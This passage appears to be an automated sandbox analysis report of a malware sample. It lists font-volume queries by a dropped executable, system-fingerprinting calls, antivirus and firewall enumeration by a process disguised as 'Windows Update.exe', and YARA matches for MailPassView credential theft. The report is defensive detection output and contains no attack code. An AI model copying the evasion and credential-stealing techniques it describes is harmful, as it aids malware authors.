                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\4.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\4.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004306EC cpuid 4_2_004306EC
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00405038 GetLocalTime,CreateEventA,CreateThread,4_2_00405038
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_004440B8 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_004440B8
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0041778E GetComputerNameExW,GetUserNameW,4_2_0041778E
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_0040594D

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Increases the number of concurrent connection per server for Internet ExplorerShow sources
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected MailPassViewShow sources
                    Source: Yara matchFile source: 40.2.5.exe.493dc72.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b0dc72.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a7ec92.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48e7e0d.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4ab0000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.3759660.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.2.Windows Update.exe.4b0dc72.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 44.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.5.exe.48aec92.9.raw.unpack, type: UNPACKEDPE
